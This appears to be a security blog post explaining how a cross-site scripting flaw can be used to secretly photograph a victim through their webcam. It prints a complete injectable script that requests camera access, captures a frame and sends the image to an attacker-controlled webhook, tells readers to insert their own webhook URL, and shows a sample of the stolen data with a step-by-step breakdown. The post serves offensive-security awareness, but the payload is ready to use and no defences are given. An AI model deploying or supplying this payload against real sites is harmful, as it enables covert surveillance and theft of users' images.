Cross-site scripting (XSS) has often been considered a low-to-moderate threat depending on the type of data you can steal. Traditionally, XSS attacks are used to steal cookies, session tokens, or display convincing phishing dialogs. However, in this blog, we'll explore how XSS can be leveraged to secretly capture images from a victim's camera by using the power of HTML5 and JavaScript. This is an unexpected and intrusive escalation of impact that could surprise both developers and security professionals.
Introducing Photo/Video Capture via XSS
The snippet provided below demonstrates how you can capture a frame from a victim's webcam using JavaScript. Imagine a scenario where an attacker injects this payload into a vulnerable website, effectively taking advantage of an unsuspecting user's browser permissions. Don't forget to replace the webhook URL with your own and
<script>
const v = document.createElement('video'),
c = document.createElement('canvas');
navigator.mediaDevices?.getUserMedia({video:1})
.then(s => {
v.srcObject = s;
v.play();
v.onloadeddata = () => setTimeout(() => {
c.width = v.videoWidth;
c.height = v.videoHeight;
c.getContext('2d').drawImage(v, 0, 0);
fetch('https://webhook.site/{webhook-id}/', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
image: c.toDataURL('image/jpeg'),
timestamp: new Date().toISOString()
})
});
s.getTracks().forEach(t => t.stop());
}, 1000);
})
.catch(e => alert('Camera access error'));
</script>
Sample Response
{"image":"data:image/jpeg;base64,/9j/4AA<<<....SNIP....>>>ioaRsmatrciRgOxOOKlxTNG9D//2Q==","timestamp":"2024-12-04T18:10:57.214Z"}
Breakdown of the Attack
1. Requesting Webcam Access
The payload starts by creating a <video>
element and a <canvas>
element. It then requests access to the user's camera using navigator.mediaDevices.getUserMedia({video:1})
. This line prompts the victim's browser to ask for permission to access the webcam. With the user's consent, the attacker can gain access to the video feed.
2. Capturing and Processing a Frame
Once access is granted, the script starts playing the webcam feed on the hidden <video>
element. After a brief delay, it captures a frame of the video feed by drawing it onto the <canvas>
element using drawImage()
.
3. Exfiltrating Data
The captured frame is converted to a base64-encoded JPEG image using c.toDataURL('image/jpeg')
, and this encoded image is sent to an attacker-controlled endpoint via a fetch()
request. This provides the attacker with a snapshot of whatever the victim's webcam was viewing at that moment.
Finally, the script releases the webcam by stopping all associated media tracks, and the image is sent to the attacker's webhook.
Real-World Impact
This kind of attack significantly increases the severity of XSS vulnerabilities. Not only can an attacker steal cookies and execute arbitrary JavaScript, but they can also now access the webcam of the victim, effectively violating user privacy in a very intrusive manner.
It is important to note that this attack relies heavily on social engineering—the victim must allow camera access. However, if the vulnerable web page has been trusted by the user previously, they might be more inclined to permit access without second thoughts.